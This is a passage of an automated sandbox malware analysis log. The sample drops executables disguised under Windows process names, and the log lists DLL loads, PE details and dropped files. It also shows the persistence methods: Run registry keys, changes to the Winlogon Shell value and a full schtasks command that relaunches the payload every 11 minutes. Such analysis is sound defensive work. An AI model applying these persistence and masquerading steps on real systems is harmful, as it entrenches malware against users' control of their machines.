            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: mscoree.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: version.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: wldp.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: profapi.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\1a5d5b8dcee3d8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows Mail\b7ad5a7a0bb6c8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\66fc9ff0ee96c2Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows NT\TableTextService\b7ad5a7a0bb6c8Jump to behavior
            Source: 5U9CuGu1ru.exeStatic file information: File size 2612447 > 1048576
            Source: 5U9CuGu1ru.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 5U9CuGu1ru.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 5U9CuGu1ru.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 5U9CuGu1ru.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 5U9CuGu1ru.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 5U9CuGu1ru.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 5U9CuGu1ru.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: 5U9CuGu1ru.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5U9CuGu1ru.exe
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: containerdll.exe, 00000006.00000002.2190353169.0000000000B30000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: containerdll.exe, 00000006.00000002.2190353169.0000000000B30000.00000004.08000000.00040000.00000000.sdmp
            Source: 5U9CuGu1ru.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 5U9CuGu1ru.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 5U9CuGu1ru.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 5U9CuGu1ru.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 5U9CuGu1ru.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeFile created: C:\Users\user\AppData\Local\Temp\Intodhcp\__tmp_rar_sfx_access_check_4930406Jump to behavior
            Source: 5U9CuGu1ru.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081E28C push eax; ret 0_2_0081E2AA
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081ED46 push ecx; ret 0_2_0081ED59
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeCode function: 6_2_00007FF848F3791D push dword ptr [ebp-17000000h]; retf 6_2_00007FF848F37923
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeCode function: 6_2_00007FF848F32C58 pushad ; retf 6_2_00007FF848F32C81
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeCode function: 6_2_00007FF848F32C68 pushad ; retf 6_2_00007FF848F32C81
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeCode function: 6_2_00007FF848F32C78 pushad ; retf 6_2_00007FF848F32C81
            Source: C:\Users\Public\Desktop\spoolsv.exeCode function: 18_2_00007FF848F32C55 pushad ; retf 18_2_00007FF848F32C81
            Source: C:\Users\Public\Desktop\spoolsv.exeCode function: 20_2_00007FF848F2791D push dword ptr [ebp-17000000h]; retf 20_2_00007FF848F27923
            Source: C:\Users\Public\Desktop\spoolsv.exeCode function: 20_2_00007FF848F22C58 pushad ; retf 20_2_00007FF848F22C81
            Source: C:\Users\Public\Desktop\spoolsv.exeCode function: 20_2_00007FF848F22C68 pushad ; retf 20_2_00007FF848F22C81
            Source: C:\Users\Public\Desktop\spoolsv.exeCode function: 20_2_00007FF848F22C78 pushad ; retf 20_2_00007FF848F22C81
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeCode function: 22_2_00007FF848F1791D push dword ptr [ebp-17000000h]; retf 22_2_00007FF848F17923
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeCode function: 22_2_00007FF848F12C58 pushad ; retf 22_2_00007FF848F12C81
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeCode function: 22_2_00007FF848F12C68 pushad ; retf 22_2_00007FF848F12C81
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeCode function: 22_2_00007FF848F12C78 pushad ; retf 22_2_00007FF848F12C81
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeCode function: 25_2_00007FF848F32C55 pushad ; retf 25_2_00007FF848F32C81

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Users\Public\Desktop\spoolsv.exeJump to dropped file
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeFile created: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Program Files (x86)\Windows Portable Devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Recovery\ShellExperienceHost.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Users\Default\Documents\WmiPrvSE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Users\Public\Desktop\spoolsv.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsvJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsvJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsvJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory CompressionJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
